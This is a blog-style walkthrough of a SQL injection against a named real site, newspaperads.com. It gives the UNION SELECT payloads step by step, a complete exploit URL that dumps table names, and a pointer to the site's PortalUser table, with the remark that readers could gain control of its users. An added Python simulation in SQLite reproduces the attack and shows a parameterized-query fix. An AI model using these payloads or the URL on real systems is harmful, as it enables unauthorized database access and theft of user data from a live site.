Today we consider the common mistake called SQL Injection, using the site www.newspaperads.com as an example. It interested me for the following reasons:
Let's send USA Today back to yesterday. Consider the following URL:
http://www.newspaperads.com/usatoday/results.asp?subcatid=1600&interfaceid=82&parent=Categories&subcatname=Travel+Specials
Here you find a page devoted to travel. It is laid out as a table with three columns: Advertiser, Summary and Date. Some of the parameters change the page content. The parameter subcatid contains the mistake. Let's try appending a single quote to the end of the parameter. The result is a SQL query error.
Let's investigate the error. To inject SQL code it is necessary to append two closing parentheses to the parameter (the value evidently sits inside two open parentheses in the query) and then a comment sequence, which cuts off all the other conditions used in the query. Let's inject the following value into the parameter subcatid:
1600)) and 1=0 --
I added the condition 1=0 and the result was empty. Articles about travel are of no use to me; I want the contents of the server's database. Now we determine the number of fields returned by the SQL query. For this purpose we inject UNION SELECT NULL, ... into the query, increasing the number of NULL fields one at a time. In my case it came to 11 fields: with that many NULL fields the query error disappeared and an empty table appeared. Next we need to find out which fields end up where on the form. For this purpose we put a number unique to each field into the injected query. For example, the following query selects a distinct number, 1 to 11, in each field:
1600)) and 1=0 union all select 1,2,3,4,5,6,7,8,9,10,11--
The number 7 appeared in the Summary column. We will use the seventh field to look through the system data, and first of all we are interested in the names of the tables used in the database. They can be obtained from the table INFORMATION_SCHEMA.TABLES. We inject the following code into the parameter subcatid:
1600)) and 1=0 union all select 1,2,3,4,5,6, TABLE_NAME, 8,9,0,11 from INFORMATION_SCHEMA.TABLES--
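The whole procedure above (cut off the query with `)) and 1=0 --`, grow `UNION ALL SELECT NULL,...` until the column-count error disappears, mark each position with its number to see which one is displayed, then place a catalogue column into that position) can be reproduced offline. The following is an added example, not code from the original article or from the site: the query text, column names and rows are constructed, because the real results.asp query is unknown; it only mirrors what the page demonstrates, namely that the parameter sits inside two parentheses, the query returns 11 columns and the 7th is shown as Summary. SQLite stands in for the site's SQL Server, so `sqlite_master` takes the place of `INFORMATION_SCHEMA.TABLES`. The last function shows the fix: validate the type and bind the value instead of pasting it into the SQL text.

```python
import sqlite3

# Constructed stand-in for the site's query (assumption: the real query shape is
# unknown; this one reproduces the two-parenthesis, 11-column form the page infers).
VULNERABLE_SQL = (
    "SELECT AdId, InterfaceId, SubCatId, Advertiser, AdDate, Price, Summary, "
    "Phone, Email, Url, Extra FROM Ads "
    "WHERE ((SubCatId = {subcatid}) AND (InterfaceId = 82)) ORDER BY AdDate DESC"
)


def build_db():
    """Constructed sample database: one ad and one PortalUser row."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE Ads (AdId INTEGER, InterfaceId INTEGER, SubCatId INTEGER,
            Advertiser TEXT, AdDate TEXT, Price TEXT, Summary TEXT,
            Phone TEXT, Email TEXT, Url TEXT, Extra TEXT);
        CREATE TABLE PortalUser (UserName TEXT, Password TEXT);
        INSERT INTO Ads VALUES (1, 82, 1600, 'Acme Travel', '2004-05-01', '$99',
            'Weekend fares to Miami', '', '', '', '');
        INSERT INTO PortalUser VALUES ('admin', 'constructed-secret');
    """)
    return conn


def results_page(conn, subcatid):
    """The vulnerable pattern: the request parameter is pasted into the SQL text."""
    return conn.execute(VULNERABLE_SQL.format(subcatid=subcatid)).fetchall()


def render(rows):
    """The page shows three of the 11 columns: Advertiser, Summary, Date."""
    return [(r[3], r[6], r[4]) for r in rows]


def count_columns(conn, max_cols=32):
    """Grow 'UNION ALL SELECT NULL,...' until the column-count error goes away."""
    for n in range(1, max_cols + 1):
        payload = "1600)) and 1=0 union all select " + ",".join(["NULL"] * n) + "--"
        try:
            results_page(conn, payload)
            return n
        except sqlite3.OperationalError:  # column-count mismatch: keep growing
            pass
    return None


def visible_positions(conn, ncols):
    """Select 1..ncols so the rendered page reveals which positions are displayed."""
    markers = ",".join(str(i) for i in range(1, ncols + 1))
    rows = results_page(conn, f"1600)) and 1=0 union all select {markers}--")
    return render(rows)[0]  # the middle value is the position shown as Summary


def dump_table_names(conn, pos, ncols):
    """Put the catalogue's name column into the displayed position and read it back."""
    cols = [str(i) for i in range(1, ncols + 1)]
    cols[pos - 1] = "name"  # sqlite_master.name stands in for TABLE_NAME
    payload = ("1600)) and 1=0 union all select " + ",".join(cols)
               + " from sqlite_master where type='table'--")
    return sorted(r[pos - 1] for r in results_page(conn, payload))


def results_page_fixed(conn, subcatid):
    """The fix: reject non-numeric input and bind the value as a parameter."""
    sql = VULNERABLE_SQL.replace("{subcatid}", "?")
    return conn.execute(sql, (int(subcatid),)).fetchall()


if __name__ == "__main__":
    db = build_db()
    print(render(results_page(db, "1600")))                # the normal page
    print(render(results_page(db, "1600)) and 1=0 --")))   # empty page
    n = count_columns(db)
    shown = visible_positions(db, n)
    print(n, shown)
    print(dump_table_names(db, shown[1], n))
    try:
        results_page_fixed(db, "1600)) and 1=0 --")
    except ValueError as err:
        print("rejected:", err)
```

`count_columns` stops at 11 because that is the first width at which the compound SELECT parses; `visible_positions` then returns `(4, 7, 5)`, i.e. position 7 is the Summary cell, exactly what the page found by eye. The fixed variant raises `ValueError` on any of these payloads and, even for a string that happened to parse as an integer, never lets the value alter the query structure.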
We see the list of the database's tables. Most interesting is that only the first 20 rows are shown, but at the bottom of the page there is page navigation: 1, 2, 3 ... The navigation is very convenient because it works even with our injected query, so we do not need to limit the output ourselves inside the SQL injection.
Look at the table PortalUser on the third page of results. It contains the portal's users. You could gain full control over them!
Full URL with the error:
http://www.newspaperads.com/usatoday/results.asp?subcatid=1600))%20and%201=0%20union%20all%20select%201,2,3,4,5,6,%20TABLE_NAME,%208,9,0,11%20from%20INFORMATION_SCHEMA.TABLES--&interfaceid=82&parent=Categories&subcatname=Travel+Specials
I'm not a hacker; I use this article to show you a real SQL Injection error. I have written an e-mail to the newspaperads.com administrator and I hope he will correct the web site.